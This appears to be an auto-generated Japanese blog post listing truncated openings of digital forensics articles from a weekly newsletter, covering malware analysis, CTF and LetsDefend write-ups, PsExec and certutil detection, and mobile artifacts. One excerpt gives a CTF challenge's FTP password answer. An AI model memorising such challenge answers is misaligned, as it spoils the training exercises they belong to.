本エントリは This Week in 4n6 (FourAndSix=Forensics) で紹介された各記事の冒頭を表示し、チェックする記事をザッピングするために自動生成&投稿したものです。4n6 は こちら からご確認いただけます。
FORENSIC ANALYSIS
Adam at Hexacorn
January 22, 2023 in Excel One of the most common use cases we come across during our malware analysis exercises is a ROI-driven comparison of features between many samples of the same malware family. Yes, we can use BinDiff, Diaphora (and we should), but if it is a time-sensitive research, we need to take some shortcuts to deliver early results pronto. Here’s one way to do it. Note: I have used this approach many times in the past, because it’s simple, easy to understand, and produces a visual t...
Emi Polito at Amped
Being able to measure an object or a person (or an animal ?! ) in a two dimensional image is in high demand these days within the forensic video community. We all know (or should know!) that in Amped FIVE it is possible to calculate measurements such as the height of an unknown person or the speed of a vehicle from CCTV and other video evidence. And we have a variety of different filters in the Measurement group that can do the job just fine, such as Measure 1D, Measure 2D, Measure 3D and Speed ...
Cado Security
Craig Ball at ‘Ball in your Court’
Dany at Digitella
CyberDefenders PCAP Or It Didn't Happen Challenge Write Up Hello everyone! In this post I will walk you through this challenge. You will need to make sure that you have Wireshark installed. It can be done so through here - //www.wireshark.org/download.htmlWhat is the FTP password?To get the FTP password, I simply used the ftp filter. Then I scrolled down to a packet that had the term PASS in it. As you can see, the password is AfricaCTF2021. What is the IPv6 address of the DNS server used by 1...
Domiziana Foti
LetsDefend-SOC163 — Suspicious Certutil.exe UsageCertutil.exe is a command-line program intended by Microsoft used to dump and view certificate authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.So why can this command be considered suspicious?Precisely because it is not dangerous in nature and can be easily employed by threat actors to camouflage their malicious activity.LOLBins ...
Dr. Neal Krawetz at ‘The Hacker Factor Blog’
Fabian Mendoza at AboutDFIR
The Key to Identify PsExec By Fabian MendozaOn January 18, 2023January 20, 2023 Summary: In one way or another, PsExec – a wildly popular remote administration tool in the Microsoft SysInternals Suite – peeks its head in the wild. Threat actors tend to leverage PsExec for various reasons, such as executing programs on a remote host in a victim’s environment, or for more nefarious reasons, such as deploying ransomware. The focus of this blog is to bring attention to a relatively new method of ide...
Leonardo M. Falcon at Falcon Guard
Cognitive biases are systematic patterns of deviation from the norm or rationality in judgment, whereby inferences about other people and situations may be drawn in an illogical fashion. These biases are a result of the brain's attempt to simplify information processing. Cognitive biases can lead to perceptual distortion, inaccurate judgment, illogical interpretation, or what is broadly called irrationality.Cognitive biases can affect the decision-making process of individuals, as well as groups...
Forensafe
Application 20/01/2023 Friday uTorrent for Android is a mobile version of the popular uTorrent desktop application that allows users to download and share files on their Android devices. It is a P2P file-sharing program that utilizes the BitTorrent protocol to download files over the internet. Digital Forensics Value of Android uTorrent Application The forensic significance of uTorrent artifacts lay in its ability to supply investigators with valiable information in cases of illegal or copyright...
Kevin Pagano at Stark 4N6
Posted by Kevin Pagano January 18, 2023 Get link Facebook Twitter Pinterest Email Other Apps In my efforts to get more content up and more app parsers added to ALEAPP, I decided to take a look at Josh Hickman's Android 13 image. One app that I know Josh had looked at before (very extensively at that) was the Garmin Connect app. Garmin is probably one of the more well known brands from the Android side, along with FitBit, for tracking exercises. They have an extensive list of popular wearables an...
Lordx64
Multiple Linux Backdoors Discovered Targeting Bitcoin Core Developer — Technical AnalysisPhoto by Matthew Ball on UnsplashContextFirst and foremost, I would like to express my gratitude to Luke, one of the Core Bitcoin developers, for sharing with me the information he uncovered on his compromised Linux server.Luke’s, Linux server was targeted in an attack that was quite unfamiliar. This prompted me to reach out to Luke immediately after I heard the news. After investigating, Luke determined tha...
Manjesh Shetty
Uncovering Hidden Clues: How Windows Artifact Prefetch Can Help in Digital Forensics Investigations in Windows 11 MachineJanuary 15, 2023Prefetch is a feature in Windows that helps the operating system quickly launch frequently used programs by preloading the necessary files into memory. This can speed up the start-up process and make the overall experience of using the computer more responsive. Prefetch is a feature in Windows operating systems that stores information about recently run program...
Brad Duncan at Palo Alto Networks
3,967 people reacted 5 4 min. read Share By Brad Duncan January 20, 2023 at 6:00 AM Category: Tutorial Tags: AgentTesla, Cloud-Delivered Security Services, Cortex XDR, next-generation firewall, OriginLogger, threat prevention, WildFire, Wireshark, Wireshark Tutorial This post is also available in: 日本語 (Japanese)Executive Summary Welcome to the January 2023 Unit 42 Wireshark quiz. This blog presents a packet capture (pcap) of malicious activity and asks questions based on information derived from...
RJM at Anchored Narratives
anchorednarratives.substack.comCopy linkTwitterFacebookEmailThe Trojan did it defence is real!A historical deep dive in planting digital evidence by nation-state actors to incriminate political opponents.RJMFeb 13, 2022Share this postThe Trojan did it defence is real!anchorednarratives.substack.comCopy linkTwitterFacebookEmailCover: Activist Rona Wilson is brought to court June 7, 2018, in Pune, India. (Pratham Gokhale/Hindustan Times/Getty Images)Disclaimer: The views, methods, and opinions exp...
anchorednarratives.substack.comCopy linkTwitterFacebookEmailThe Trojan solved the Bhima Koregaon case!How proper file, malware, and memory forensics techniques were able to catch the ModifiedElephant threat actor planting incriminating evidence on defendants' computers in India.RJMJan 154Share this postThe Trojan solved the Bhima Koregaon case!anchorednarratives.substack.comCopy linkTwitterFacebookEmailDisclaimer: The views, methods, and opinions expressed at Anchored Narratives are the author’s...
Paolo Dal Checco at Studio d’Informatica Forense
Pubblicato il 21 Gennaio 2023 da Paolo Dal CheccoNell’ambito delle perizie informatiche forensi il tempo è un elemento dirimente, che ricorre in diversi contesti delle analisi tecniche: timeline, supertimeline, metadati, perizie su email ordinarie o PEC, data di creazione, modifica o accesso di un file, data di pubblicazione di un post o una pagina web, sono diventati argomenti su cui si ragiona quasi quotidianamente.Ulteriori complicazioni vengono dalle varie interpretazioni del tempo informati...
System Weakness
What is LetsDefend?LetsDefend is a Blue Team training platform that helps security learners gain experience by practicing their cyber investigation skills in a simulated SOC (Security Operations Center) environment. Its purpose is to assist current and future SOC analysts with their skills in investigating incidents and developing management reports.Challenge Type: Malware analysisPurpose: To analyze a malicious XLS file**Question 1: What is the date the file was created?We begin by running the ...
